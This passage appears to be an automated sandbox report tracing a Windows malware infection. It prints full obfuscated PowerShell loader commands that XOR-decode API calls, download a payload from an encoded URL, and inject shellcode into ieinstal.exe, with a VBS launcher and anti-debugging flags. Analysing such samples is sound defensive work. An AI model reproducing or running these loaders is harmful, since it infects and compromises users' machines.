0 0 4N0XCO4S7 2S0T0 7P1 DJ0BCB1 B 0A6 1P9P3VAI0 CH1CBV1dF 0I0 0 AD0WCB1 AU4 7 2 4Y0 8 1CBC1 AA0e1 0K8 0 5M3H4 5 3 5 3A2 EI0FC 1ZDA2 D 0OCS0G5 0 C 0SE 0S8 1NDK0 CV2 F 0S6 1GBS2SF 1SC 0a7 0 AA1HDL0 0H0F6 0P7U3C9 0B6M0S0W0W7D1EDD0NCV1BBO4P1M4N1 0 Fk0G2C1 9A4F9 4 DS2 0 0 7 0 DB1 CB4 9 4AD 2M0S0B7T0EAF0C5 5 9R5AAA4F0U4S5H4 9J4S1A2 EU2CD 3hD 4T9 2C9P4B1 3 2R2 0D0 7o1BDm3A9C1FD 1 BP3K4 4k0 4 9B4N1 3t2L2B0T0F7O1DD 3B9 1 DH1 BR3 4G4S0 4S0 4 0B'C; .V( `$Be hKr l 7M)p F`$RI n cRlC0U2U;U`$ TRrKodtAhSe dA7 =B AITnIcMlM1T1 R'N4GDS3 DF0 0 1S9 0 6C4L9 5B4 4 9 4 DT2A8 1U9C0A8 1PD 0D8E4p7p2O0i0 7S1 FB0 6H0 2 0 CT4 1 5 9S4 0 'A; . (S`$Oe h r lM7S)G `$FTOrDoDtPhGeJdS7P;U`$ST r oUtAhBead 7s S=S I nUcBlV1L1T 'F4 DB2aB 0G0A1kA 1BD 0D8M1 DF0 C 0S0R5DB 5SDM5F8L4O7O2F0 0A7e1lFG0B6 0L2 0KC 4p1S4FDL3CDU0E0 1H9 0p6S4U5U4 9 5M9C4M0 'S; .B(C`$Me h rUl 7V)P `$UT rHoPt hBeFd 7 ; `$ TSrToRt hIeFd 6 =P KIAn cBlH1K1C U'T4FD 0 0B0S7H0oDB0AFB0 3S0 CT1 D 4C9S5M4 4 9T3P2 3UAK1 0T1SA 1 D 0 CE0S4 4 7V3EB 1DCR0N7K1TDV0S0 0 4S0TC 4u7 2H0D0 7 1 D 0 CF1GBD0G6 1B9 3nAD0SCS1LB 1 FS0O0 0TAM0BCi1 AP4 7S2K4 0D8 1 B 1 Ae0T1 0P8S0M5v3I4B5E3t5 3P2oE 0 CC1 DN2 DL0 Cu0 5M0HCS0 ET0a8B1 D 0vCO2 FB0C6 1MBU2uFA1 C 0K7 0SAI1KDN0C0 0 6u0 7 3 9m0c6U0 0B0B7S1KD 0 CD1KBN4T1 4 1 0LF 0T2 1 9 4 9c4uD 2 0 0 7 0 Dt1uC 4S9 4AD 0MCG0 1 1iB 0 5M5pDg4A0E4s5B4T9B4 1F2 E 2 D 3CDR4 9O2O9S4 1S3C2 2S0 0P7 1HDL3S9 1BD 1 BS3E4 4P5 4S9J3R2K3SC 2 0 0 7m1PDR5TA 5 B 3S4B4 5A4K9B3 2 3FCP2 0p0U7R1 DH5MAG5 BE3D4c4E5 4c9R3 2 3 C 2f0T0D7 1MD 5PAG5PBd3K4 4C0T4 9 4B1D3H2G2G0B0S7K1 D 3F9N1 DU1 Bb3 4S4 0D4 0B4H0 ' ; . (A`$ eBh rTlF7A) `$STBr oIt hPe dT6P; `$GP s yPcA S=M fPk pO C`$DeEhsrNlI5P B`$PeihSrPl 6 ; `$BTNrEoKtNhGendP7C =F UIRnFc lG1D1 's4 D 3I9 0G8 1VF 0SC 0 2C0 0B1TBD0 2 0SC 0 7j5KAC4D9 5H4 4S9H4SD 0G0V0p7S0SDU0 FD0A3A0 Ck1GD 4 7A2S0 0A7C1nFF0A6 0R2G0FC 4 1F3H2K2m0T0G7 1DDS3 9 1 D 1CBM3S4R5B3 5R3 3 3U0 CS1BBG0M6S4 5K4r9 5FF 5SC 5GFR4M5 4B9R5S9S1 1c5 AL5m9 5 9 5N9B4 5B4g9F5T9 1L1b5BDA5B9C4F0 ' ; .G(V`$IeKh rSl 7 )S F`$ TSrSoRt h e d 7P;H`$PTEr o tAhAe d 8 = IGnOcBl 1 1 O' 4UD 3 EU0 1Z0 CE1SBA0 Cv0PFU4 9T5 4v4 9V4RD 0T0I0G7 0FDA0 FC0M3 0 CV1ADK4S7F2 0s0R7 1 F 0S6 0g2P0aC 4M1D3 2P2 0S0S7K1MDW3D9 1PDE1 BC3S4T5 3T5 3 3 3t0 CH1SB 0S6H4N5T4 9B5 BC5 8 5 8 5T1R5 1f5 FA5D9 5r1 4 5 4 9N5U9S1S1B5 A 5S9 5m9 5U9K4Y5K4F9b5 9c1 1O5 D 4E0 ' ;B.K(h`$ e hRrTl 7 ) K`$BTerSo t hAeSd 8 ; `$ Idn cVlS0 1F N=E DI nUc l 1 1D K' 0C1 1ADP1EDB1 9 1 Ao5 3 4 6K4I6C1E8 1FC 0P0C0 AA0 2 0SA 0K1F0 CI0BAS0P2E1 1A4K7U0MEO0 0 1 DK0 1 1UC 0HBB4 7F0 0P0 6U4N6E1S8 1HCP0 0R0 A 0S2A0 4 0ACk4U6B3 CR0 DN0 ES0 8v0S7B4S7 1VCB5DA 5TBF' ;m`$ IKn cUlP0P0S T= I nKc lS1G1 S'F4 D 3sA 1O9s0E1o0fC 1 BH0P6P0L4 4t9 5K4G4L9e4L1T2C7N0 CR1 Eh4S4 2 6r0 BD0K3 0CC 0 AG1RDK4M9O2B7D0 C 1OD 4P7L3 E 0 CB0 BL2 AA0P5U0 0 0BCU0P7 1BDU4R0U4A7S2FDA0 6O1IEU0 7X0W5 0S6Z0 8F0PDS3 AS1 D 1IBP0b0E0 7 0UEK4B1P4PD 2 0 0K7 0RAD0P5 5M9A5 8S4 0r' ; `$TTMr o t hDeVd 8H E= I ndc lM1Y1U M'F4BDB3U9 0B8A1KFP0AC 0A2a0B0S1EB 0B2S0LC 0 7T5 BH5p4S4 DD0DC 0 7S1AFL5 3U0T8O1P9 1S9 0KDM0O8 1lD 0V8 ' ;A. (C`$GePhKr lO7E)V A`$FTTr oVtShSe d 8z; `$FPPaHvIeNk i rSk e n 2D=U`$WP aFvAeJkRiMr k eBnM2 +I'K\TSepAass . u r f 'A;L`$ S pLhUe rPoVmG=s'S'I;Pinf S( -Pn oKt ( T e stt -SPAaHtEh `$ P a vce k i r kPe nT2 ) ) {uwShPiIlPe T( `$ SPpKhAe r oPmG F-VeAq R' 'n)n k{A.H( `$eeShCrPl 7I)G V`$AI n c lE0T0 ; SdtCaNr tR-SS lCeMeEpN 5C;n} SKeTt -sC oEn t egn t A`$LPPaCvOe kSiTrTkkepns2H `$DSNpChDeMrVo m ;N} `$ SRp h eUrCo mS = GTe te-SCMoOnFtCeFnst E`$LPRa v egkfiFr kPeon 2 ;S`$ T rOoFtPh eSdF9S =S IAnUc lB1A1B O'L4 D 3 DD1TB 0 6C1CD 0P1M0CCB0PDT4H9H5S4A4F9s3g2B3PA 1H0 1 A 1ADU0 CC0 4V4H7 2UAF0T6 0G7 1IFH0PC 1RBN1PDS3 4C5N3 5A3 2AFN1EB 0A6U0Z4E2HB 0 8C1rAR0 CA5AFP5cDC3 A 1 DS1 BR0B0F0D7A0REB4 1 4UD 3DA 1 9 0 1 0 CW1VB 0E6 0P4R4I0 'P; . ( `$ eFh r lE7 ) `$ TtrPo tEh e dF9V;S`$FS pDh e rEo mD0 B=O IMn cElH1K1S 'M3G2 3TAT1B0G1 A 1KDP0PC 0S4R4S7S3 BU1 CP0O7P1 D 0 0T0 4B0TCB4A7S2 0U0 7V1 D 0FCu1WBB0s6D1 9O3 AA0 C 1MB 1 Fe0 0R0KAO0RCP1 AY4 7 2 4 0S8 1PBN1BAA0M1V0V8K0 5 3 4I5 3 5 3K2MAU0 6R1U9A1S0 4N1B4 D 3MDS1BB 0m6 1 D 0 1 0RC 0LDe4E5 4T9L5B9P4C5I4M9 4S9 4VDP3K9L0 8E1HF 0 C 0R2M0 0m1LBB0r2 0SCP0 7 5SA 4U5 4 9 5JFH5 C 5AF 4U0 ' ;M.S( `$ eDhBrSl 7 )e `$PSTpAh e rPoTmB0V; `$SM aGg nY= `$UTJrFo tSh eLd .Dc olu nAts- 6U5 6D;S`$ZS p hde r o mc1 K=t IKn c lA1 1P H' 3M2 3 A 1 0 1 AM1 D 0SC 0L4 4 7 3JB 1SCB0R7F1ADC0I0 0 4P0 CE4f7 2F0E0 7A1 DE0 CM1PBM0C6 1H9B3TA 0OCH1 B 1 F 0U0S0MAO0pC 1LAf4S7B2O4 0S8 1rBF1MAS0 1B0 8 0 5 3F4 5A3 5C3r2 AS0t6D1S9 1a0p4 1A4ADA3FD 1 BP0P6 1BDG0 1B0uC 0oDI4S5 4 9C5PFH5KC 5 FR4S5 4S9 4SDD3 EK0 1K0 Cl1 BM0KCD0IFI4B5E4R9K4eD 2S4H0 8U0 E 0P7 4O0E' ;E. ( `$Fe hKrTlN7M)p S`$ASUpPhFe rBo mM1 ;O`$ S pMhsePrZo mV2L G= BIGn c l 1R1S 'A4HDT2S1F1S0I0 DP1UB 0M6M1 9M0L1S4D9 5 4E4 9S3 2M3 A 1 0T1CAR1CDM0 C 0 4H4F7 3 B 1 C 0 7 1TD 0T0F0 4 0RCH4 7 2T0V0A7O1CD 0 C 1pB 0 6A1 9P3OAH0 CA1DB 1RFS0F0S0 A 0ECG1FAS4G7 2B4 0U8O1RBI1BA 0K1S0S8U0W5K3 4T5 3e5T3A2 ES0 CO1CDG2 DV0ACM0 5u0 CM0UEB0S8D1 D 0 CF2GFO0D6H1eB 2UFB1IC 0S7 0PAS1SDL0 0H0H6A0 7 3 9s0D6O0 0 0 7T1 DM0GCI1EBB4 1S4H1 0 F 0S2S1 9 4A9T4HDG3AAE0 6N1RBg0M6 4R9P4ADa2A0 0G4 0 4K0 8T0 7 4U0C4 5S4 9 4 1G2NE 2GD 3 D 4 9f2P9M4D1m3p2T2 0T0S7 1ZDM3 9O1RDA1iB 3S4 4R5 4T9B3A2U2T0O0E7 1BDR3 9S1 D 1 B 3O4S4K5 4 9 3 2 2U0F0O7U1BD 3N9 1BDF1 Bm3S4 4 5 4 9A3U2E2L0G0M7 1 D 3P9 1FDT1 BI3 4 4B5K4M9 3f2 2M0A0T7U1ADT3 9T1MD 1SB 3 4R4 0F4 9 4 1L3 2 2 0D0 7T1VDM3 9 1 DT1 Bm3S4U4C0 4 0 4 0 'a; . (C`$FeBh r lK7H)H C`$MSCpNh eGrKo mB2 ;C`$GSUp h e rOo mP3 c=S WIBnMcTlB1 1S ' 4CDk2h1S1 0 0LD 1NBF0 6 1F9 0K1 4 7I2B0 0 7B1 FM0D6O0S2 0TCK4H1 4HDB3 9B0R8s1TFT0 C 0L2A0 0 1 B 0 2 0DCN0m7O5KAM4B5b4 DJ3GEA0A1E0FCK1JBG0TCR0lFK4e5S4MD 3 9 1SA 1 0H0 AL4G5P5 9C4 5 5A9 4 0S' ;U. (L`$ e hsr lU7 ) R`$ S pThre rPoGm 3K#Y;""";Function Spherom9 { param([String]$Wavel); For($Foreffel=1; $Foreffel -lt $Wavel.Length-1; $Foreffel+=(1+1)){$Incl = $Incl + $Wavel.Substring($Foreffel, 1)}; $Incl;}$Prov0 = Spherom9 'LIFE X ';$Prov1= Spherom9 $Misjoinam;if([IntPtr]::size -eq 8){.$env:systemroot\*ysw*64\*indo*ower*\v1.*\po*ll.exe $Prov1 ;}else{.$Prov0 $Prov1;}"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3872

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Incl11 { param([String]$Wavel); $Lingvi = ''; Write-Host $Lingvi; Write-Host $Lingvi; Write-Host $Lingvi; $Unrefut = New-Object byte[] ($Wavel.Length / 2); For($Foreffel=0; $Foreffel -lt $Wavel.Length; $Foreffel+=2){ $Kommando = $Wavel.Substring($Foreffel, 2); $Unrefut[$Foreffel/2] = [convert]::ToByte($Kommando, 16); $Lastendes160 = ($Unrefut[$Foreffel/2] -bxor 105); $Unrefut[$Foreffel/2] = $Lastendes160; } [String][System.Text.Encoding]::ASCII.GetString($Unrefut);}$Matema0=Incl11 '3A101A1D0C04470D0505';$Matema1=Incl11 '24000A1B061A060F1D473E00075A5B473C071A080F0C27081D001F0C240C1D01060D1A';$Matema2=Incl11 '2E0C1D391B060A280D0D1B0C1A1A';$Matema3=Incl11 '3A101A1D0C04473B1C071D00040C4720071D0C1B06193A0C1B1F000A0C1A472108070D050C3B0C0F';$Matema4=Incl11 '1A1D1B00070E';$Matema5=Incl11 '2E0C1D24060D1C050C2108070D050C';$Matema6=Incl11 '3B3D3A190C0A0008052708040C454921000D0C2B103A000E4549391C0B05000A';$Matema7=Incl11 '3B1C071D00040C4549240807080E0C0D';$Matema8=Incl11 '3B0C0F050C0A1D0C0D2D0C050C0E081D0C';$Matema9=Incl11 '2007240C04061B1024060D1C050C';$ehrl0=Incl11 '24102D0C050C0E081D0C3D10190C';$ehrl1=Incl11 '2A05081A1A4549391C0B05000A45493A0C08050C0D454928071A002A05081A1A4549281C1D062A05081A1A';$ehrl2=Incl11 '20071F06020C';$ehrl3=Incl11 '391C0B05000A454921000D0C2B103A000E4549270C1E3A05061D45493F001B1D1C0805';$ehrl4=Incl11 '3F001B1D1C0805280505060A';$ehrl5=Incl11 '071D0D0505';$ehrl6=Incl11 '271D391B061D0C0A1D3F001B1D1C0805240C04061B10';$ehrl7=Incl11 '202C31';$ehrl8=Incl11 '35';$Soro=Incl11 '3C3A2C3B5A5B';$Imman=Incl11 '2A0805053E00070D061E391B060A28';function fkp {Param ($Roman, $Makaronie) ;$Trothed0 =Incl11 '4D2F0C1B0449544941322819192D06040800073453532A1C1B1B0C071D2D0604080007472E0C1D281A1A0C040B05000C1A41404915493E010C1B0C44260B030C0A1D4912494D36472E05060B0805281A1A0C040B05102A080A010C494428070D494D364725060A081D000607473A1905001D414D0C011B05514032445834472C181C08051A414D24081D0C04085940491440472E0C1D3D10190C414D24081D0C04085840';.($ehrl7) $Trothed0;$Trothed5 = Incl11 '4D240005004954494D2F0C1B04472E0C1D240C1D01060D414D24081D0C04085B4549323D10190C3234344929414D24081D0C04085A45494D24081D0C04085D4040';.($ehrl7) $Trothed5;$Trothed1 = Incl11 '1B0C1D1C1B07494D240005004720071F06020C414D071C050545492941323A101A1D0C04473B1C071D00040C4720071D0C1B06193A0C1B1F000A0C1A472108070D050C3B0C0F3441270C1E44260B030C0A1D493A101A1D0C04473B1C071D00040C4720071D0C1B06193A0C1B1F000A0C1A472108070D050C3B0C0F4141270C1E44260B030C0A1D4920071D391D1B404549414D2F0C1B04472E0C1D240C1D01060D414D24081D0C04085C40404720071F06020C414D071C0505454929414D3B060408074040404045494D240802081B0607000C4040';.($ehrl7) $Trothed1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Ilderem,[Parameter(Position = 1)] [Type] $Glasslibe = [Void]);$Trothed2 = Incl11 '4D2A060C05081A1D1B495449322819192D06040800073453532A1C1B1B0C071D2D0604080007472D0C0F00070C2D10070804000A281A1A0C040B05104141270C1E44260B030C0A1D493A101A1D0C04473B0C0F050C0A1D00060747281A1A0C040B05102708040C414D24081D0C04085140404549323A101A1D0C04473B0C0F050C0A1D000607472C04001D47281A1A0C040B05102B1C00050D0C1B280A0A0C1A1A3453533B1C0740472D0C0F00070C2D10070804000A24060D1C050C414D24081D0C04085045494D0F08051A0C40472D0C0F00070C3D10190C414D0C011B055945494D0C011B05584549323A101A1D0C0447241C051D000A081A1D2D0C050C0E081D0C3440';.($ehrl7) $Trothed2;$Trothed3 = Incl11 '4D2A060C05081A1D1B472D0C0F00070C2A06071A1D1B1C0A1D061B414D24081D0C04085F4549323A101A1D0C04473B0C0F050C0A1D000607472A08050500070E2A06071F0C071D0006071A3453533A1D08070D081B0D45494D20050D0C1B0C0440473A0C1D200419050C040C071D081D0006072F05080E1A414D24081D0C04085E40';.($ehrl7) $Trothed3;$Trothed4 = Incl11 '4D2A060C05081A1D1B472D0C0F00070C240C1D01060D414D0C011B055B45494D0C011B055A45494D2E05081A1A05000B0C45494D20050D0C1B0C0440473A0C1D200419050C040C071D081D0006072F05080E1A414D24081D0C04085E40';.($ehrl7) $Trothed4;$Trothed5 = Incl11 '1B0C1D1C1B07494D2A060C05081A1D1B472A1B0C081D0C3D10190C4140';.($ehrl7) $Trothed5 ;}$Indu = Incl11 '020C1B070C055A5B';$Incl03 = Incl11 '2E0C1D2A06071A06050C3E00070D061E';$Incl00=Incl11 '3A01061E3E00070D061E';$Incl01 = Incl11 '4D2B001A1D081D0C005B5D58495449323A101A1D0C04473B1C071D00040C4720071D0C1B06193A0C1B1F000A0C1A4724081B1A0108053453532E0C1D2D0C050C0E081D0C2F061B2F1C070A1D000607390600071D0C1B41410F0219494D3A061B06494D20070A055959404549412E2D3D4929413220071D391D1B344549323C20071D5A5B344049413220071D391D1B34404040';.($ehrl7) $Incl01;$Incl02 = Incl11 '4D2819081D08495449323A101A1D0C04473B1C071D00040C4720071D0C1B06193A0C1B1F000A0C1A4724081B1A0108053453532E0C1D2D0C050C0E081D0C2F061B2F1C070A1D000607390600071D0C1B41410F0219494D20070D1C494D20070A05595A404549412E2D3D4929413220071D391D1B344049413220071D391D1B34404040';.($ehrl7) $Incl02;$Trothed7 = Incl11 '4D3D0019064954494D2819081D084720071F06020C415940';.($ehrl7) $Trothed7;$Trothed7 = Incl11 '4D2B001A1D081D0C005B5D584720071F06020C414D3D00190645495940';.($ehrl7) $Trothed7;$Trothed6 = Incl11 '4D00070D0F030C1D495449323A101A1D0C04473B1C071D00040C4720071D0C1B06193A0C1B1F000A0C1A4724081B1A0108053453532E0C1D2D0C050C0E081D0C2F061B2F1C070A1D000607390600071D0C1B41410F0219494D20070D1C494D0C011B055D404549412E2D3D4929413220071D391D1B344549323C20071D5A5B344549323C20071D5A5B344549323C20071D5A5B344049413220071D391D1B34404040';.($ehrl7) $Trothed6;$Psyc = fkp $ehrl5 $ehrl6;$Trothed7 = Incl11 '4D39081F0C02001B020C075A4954494D00070D0F030C1D4720071F06020C413220071D391D1B345353330C1B0645495F5C5F454959115A595959454959115D5940';.($ehrl7) $Trothed7;$Trothed8 = Incl11 '4D3E010C1B0C0F4954494D00070D0F030C1D4720071F06020C413220071D391D1B345353330C1B0645495B585851515F5951454959115A595959454959115D40';.($ehrl7) $Trothed8;$Incl01 = Incl11 '011D1D191A534646181C000A020A010C0A0211470E001D011C0B47000646181C000A02040C463C0D0E0807471C5A5B';$Incl00 = Incl11 '4D3A19010C1B060449544941270C1E44260B030C0A1D49270C1D473E0C0B2A05000C071D40472D061E070506080D3A1D1B00070E414D20070A05595840';$Trothed8 = Incl11 '4D39081F0C02001B020C075B544D0C071F530819190D081D08';.($ehrl7) $Trothed8;$Pavekirken2=$Pavekirken2+'\Spas.urf';$Spherom='';if (-not(Test-Path $Pavekirken2)) {while ($Spherom -eq '') {.($ehrl7) $Incl00;Start-Sleep 5;}Set-Content $Pavekirken2 $Spherom;}$Spherom = Get-Content $Pavekirken2;$Trothed9 = Incl11 '4D3D1B061D010C0D495449323A101A1D0C04472A06071F0C1B1D3453532F1B06042B081A0C5F5D3A1D1B00070E414D3A19010C1B060440';.($ehrl7) $Trothed9;$Spherom0 = Incl11 '323A101A1D0C04473B1C071D00040C4720071D0C1B06193A0C1B1F000A0C1A4724081B1A0108053453532A061910414D3D1B061D010C0D4549594549494D39081F0C02001B020C075A45495F5C5F40';.($ehrl7) $Spherom0;$Magn=$Trothed.count-656;$Spherom1 = Incl11 '323A101A1D0C04473B1C071D00040C4720071D0C1B06193A0C1B1F000A0C1A4724081B1A0108053453532A061910414D3D1B061D010C0D45495F5C5F45494D3E010C1B0C0F45494D24080E0740';.($ehrl7) $Spherom1;$Spherom2 = Incl11 '4D21100D1B061901495449323A101A1D0C04473B1C071D00040C4720071D0C1B06193A0C1B1F000A0C1A4724081B1A0108053453532E0C1D2D0C050C0E081D0C2F061B2F1C070A1D000607390600071D0C1B41410F0219494D3A061B06494D2004040807404549412E2D3D4929413220071D391D1B3445493220071D391D1B3445493220071D391D1B3445493220071D391D1B3445493220071D391D1B344049413220071D391D1B34404040';.($ehrl7) $Spherom2;$Spherom3 = Incl11 '4D21100D1B0619014720071F06020C414D39081F0C02001B020C075A454D3E010C1B0C0F454D391A100A4559455940';.($ehrl7) $Spherom3#"
3⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:1160

C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
4⤵
- Checks QEMU agent file
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2820

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\StructuredQuery.log
1⤵
- Opens file in notepad (likely ransom note)
PID:4696

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4348

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\GrigoropoulosLaw-294029 poundage 2023-06-06 .vbs"
2⤵
- Checks computer location settings
PID:652

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir
3⤵
PID:3864

C:\Windows\System32\cmd.exe
cmd /c dir&echo ###RSHELL.EXE###
3⤵
PID:3924

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Misjoinam = """ FSu nOc tCiPo nR AI nMcFlS1 1 U{P B DpPaMrpaImM(P[aSdtBr i n gM] `$AW aFv eSl )G; `$SLFiVn g vPiF L=K ' 'B;R W r iPtAeF-LHeoIsbtU W`$FL iHnSg vFiL;P WdrAi tPeB-nH oss t U`$ L iKnTg v iI;N CWCr i tKe - HDo sUt E`$SL iAnHgSv i ;M K V S`$SU narTeSfFu t R=U BNHeBwL-oOVbgj ePcstS b yhtbeA[ ] V(f`$BWIa v eBlR. LseRnSgct hS U/M 2o)U; K S P VFno r (P`$SF oBr e fCf eFl =S0 ; C`$uFEo r emfBfAeTlI -Ulst C`$ WFaCv eOl .CL eInbgDtTh ; S`$FFVo r eAf fAe l +t= 2 ) { I S`$PKPo m mAaAnGd o =R `$SW aIv eBlt. SCuAbCsCtSr i nPg (I`$ F oprUe f f e lB,S U2 ) ; A M N O A `$CU nSrFeHfMuStC[ `$uFSoSrMe fSfAeFlF/D2 ] F=E [BcEoPnFvTeOr tA]F:A:ATGoRBRyRtSee( `$BK oCmUm acnOdToH, G1D6 )A;P `$SLCabsCt eMnAdLeBs 1b6 0 =E A( `$SU n r eIfSu t [ `$RF oOrHeFf f eOlN/T2p]S -BbRxPoAr I1 0U5V)R;V S `$LU nir etfWuMtL[C`$ FIo rCeCfSfUeAlO/M2R]t = Z`$RLTa sUt e nud e sg1 6O0 ;n P R S} S[ S t r i nUgR]G[ASUyFsPtUe m . TRe x tF.IEEnScBo dgi nAgX] : :FARSPCAIGI . GUeZtBS tTrDi nogM( `$ U n rSeRfAu tM) ; } `$HM a tIeJm a 0T=sITnAcFlT1E1 'S3SA 1M0C1SA 1 D 0 CA0S4 4 7I0 DW0 5 0H5R'I; `$LMFa tPeGmCaH1 = I nDc lP1 1 S'H2 4J0E0M0 AP1eBA0I6 1RAu0H6S0 FU1FD 4A7 3 EF0S0 0E7S5KA 5 B 4W7L3 Cd0 7 1HA 0N8d0AF 0MCS2 7A0U8R1 D 0 0 1UFP0TCL2U4B0SCD1ADM0U1K0K6 0DDS1PAS'u;v`$SMSa tCe mPa 2w= I nAcPlS1A1S ' 2DET0NCP1CDB3N9 1 B 0 6H0AAT2 8 0JD 0CD 1TBA0 CS1 AS1 AS'B;L`$MMbaTt eamMa 3H=mIAnMcSlL1 1B 'E3BAA1 0 1lA 1SDG0lCL0 4R4 7D3 BB1IC 0 7 1 DA0I0D0V4 0BC 4G7F2 0 0R7 1 DA0 CT1UBB0T6I1P9 3KAO0UC 1 BR1OFW0I0D0sAS0 CS1 A 4V7P2 1O0R8K0G7V0 Da0S5c0TC 3 BP0UCF0NFB'e; `$iM a tEePm aS4P= I nFcDl 1B1J 'u1MAI1 D 1pBD0 0B0 7 0DET'R;F`$UMUaStEeDmRaR5K=SICnmcFl 1W1U ' 2AE 0SCI1NDS2 4R0 6 0OD 1SCB0 5L0 Cb2 1H0e8H0B7D0JD 0 5C0 C ' ;C`$PM aCtNeNm a 6 = IDnmcDlS1U1 ' 3OB 3FD 3 A 1 9A0 CD0sAV0S0A0C8U0N5 2s7U0C8V0V4 0CCS4T5 4F9D2 1I0 0C0uD 0ECD2SBY1 0P3MA 0 0U0 EC4C5 4S9M3i9 1 C 0FB 0g5i0T0 0 A ' ; `$ MGast eTmVa 7 =sI nNcAl 1H1C E'K3SB 1 CK0 7U1 D 0f0J0U4 0BC 4H5T4V9 2A4C0F8 0 7N0 8S0PE 0 CA0SDB'U;P`$FM aTtTeTm aM8N=HI n c l 1 1 ' 3IB 0 CE0VF 0 5L0SCT0 A 1BD 0 CA0BDD2SDM0 CN0D5 0 C 0 EW0F8S1 DE0SCI'S;a`$ M aFtAetm aC9 =KI n c lT1 1H S'K2D0 0S7d2C4 0BC 0T4I0 6O1CBL1M0N2 4P0T6 0FDI1BC 0 5 0OC 'S; `$Ve h rSl 0 =RIFnUc lA1S1 ' 2N4 1 0O2PDA0 C 0B5V0UCT0sEK0T8 1kD 0BC 3 D 1 0L1 9O0 CN' ; `$ eGhOrFlD1U= IsnMcSlS1B1U ' 2aAE0S5B0 8A1IA 1UA 4E5P4 9 3 9S1 CP0 BU0F5 0F0A0CAR4 5 4C9 3BAd0ECM0g8T0 5O0CCO0ADI4U5 4f9 2M8 0K7H1EAU0 0 2JA 0 5A0S8P1 AI1OA 4D5 4 9a2 8 1VCR1 DR0 6T2 A 0S5S0 8B1 AB1 AT' ;C`$ eFh rGlW2K=FI n c lF1T1C F'D2B0 0S7S1KFT0S6G0L2 0 C 'A; `$seAhrr lT3M= IAn cVlW1R1N 'H3 9 1BC 0SB 0A5 0L0B0SAo4C5M4M9 2G1I0P0T0ID 0WCf2 B 1 0S3MAS0S0V0 EC4 5 4 9 2 7F0 CL1KEH3JAm0 5A0I6 1SD 4 5N4 9 3OFP0D0 1 B 1SD 1SC 0 8C0P5d'L;t`$ eShTrBl 4 =DI n c l 1S1 'A3PFZ0K0B1HB 1AD 1UCS0 8 0 5M2E8 0F5 0A5 0B6 0aAB' ; `$PeBhIrBlD5 = I nPc l 1 1 U'F0D7 1GD 0BDt0 5A0 5T'P; `$ e h rFlS6 = I n cRlP1T1 S'G2 7j1cD 3h9S1 BS0 6 1 DI0 Cn0 AE1BD 3VFU0 0B1AB 1SDC1 C 0S8S0 5 2G4R0 CA0D4N0S6G1 BB1 0 ' ;D`$UeUhSr l 7 =FIFn cMl 1B1I ' 2U0 2 CT3L1u'R;F`$SeGh r l 8a=AISn cLl 1S1 ' 3 5S' ; `$ SDo rDoS= I nHcFlU1T1 B' 3rC 3RA 2SCR3CBW5SAA5 BI'Z; `$BI mUmmaSnP=BIEn cAl 1D1A V' 2bA 0 8 0T5T0 5T3 EK0L0F0C7O0 DL0 6 1 E 3 9E1CB 0r6G0UAS2 8S'T; f uLn cPtWi o n OfDkVpF M{uPRaFr a m (S`$ R o mBaUn ,S K`$CMRa k aUrSoCnAiBeD)P S F L C;A`$ETIrUoSt h e dF0R = I n c lN1h1 ' 4GD 2CFV0RCS1AB 0r4Y4G9R5 4S4F9 4V1 3K2G2 8V1B9 1 9P2IDT0A6C0 4G0 8 0D0 0 7H3T4U5 3 5 3S2 A 1 C 1 BF1 BI0aC 0F7 1MD 2vD 0T6H0B4 0L8 0 0A0s7 4N7 2BE 0 C 1fDF2T8S1IAS1MAP0lCT0 4N0CB 0 5H0 0D0dC 1RAr4P1S4 0 4 9 1 5M4F9 3PE 0B1U0UC 1 BH0 CB4 4H2A6s0 Bo0 3K0RC 0LA 1rDP4L9 1 2R4 9 4 DN3 6U4L7B2LEI0O5M0Y6L0BBC0H8 0S5T2U8B1PAK1RAB0sCv0E4A0PB 0R5D1 0M2sA 0S8 0DA 0R1 0FC 4D9 4B4 2P8R0 7E0SDS4A9 4AD 3M6 4M7 2B5a0T6 0 AD0T8N1 DU0C0P0A6M0t7U4 7 3 Af1B9U0 5T0 0M1RDT4 1d4KDr0BC 0A1H1MBs0 5s5V1P4 0 3 2N4D4r5 8A3C4S4 7T2TCs1S8e1RCH0 8 0 5B1 A 4 1L4 DF2B4P0 8P1 D 0 CT0 4 0 8 5K9B4F0T4 9I1 4v4C0H4U7 2 EP0 Cm1 D 3PDP1R0R1B9 0 C 4O1M4JD 2 4E0L8C1BD 0 C 0R4 0o8F5 8 4N0 ' ;V.I(K`$oePh rSl 7 )U S`$ATlrNoPtIhNeBdl0S;S`$ T rLoLt hWeBdu5 P=C kIPnZc l 1L1V ' 4 DO2F4 0M0K0M5 0 0O4L9 5 4 4 9G4GDH2TFM0 CD1 BE0P4 4P7 2 ED0 CA1UD 2L4 0ACG1ED 0 1O0 6 0BDD4 1M4HDN2D4S0S8 1AD 0aCM0S4D0 8P5JB 4V5S4K9t3T2 3FDM1S0 1 9K0PC 3K2 3 4 3G4 4 9N2S9D4M1 4AD 2A4S0 8A1 DS0CC 0 4 0 8 5 Ak4H5r4R9 4DDN2F4A0S8 1ADB0AC 0I4 0B8t5 D 4 0H4K0 ' ;D. ( `$KeGhPr l 7 ) `$STPrno tSh eSd 5I;H`$ 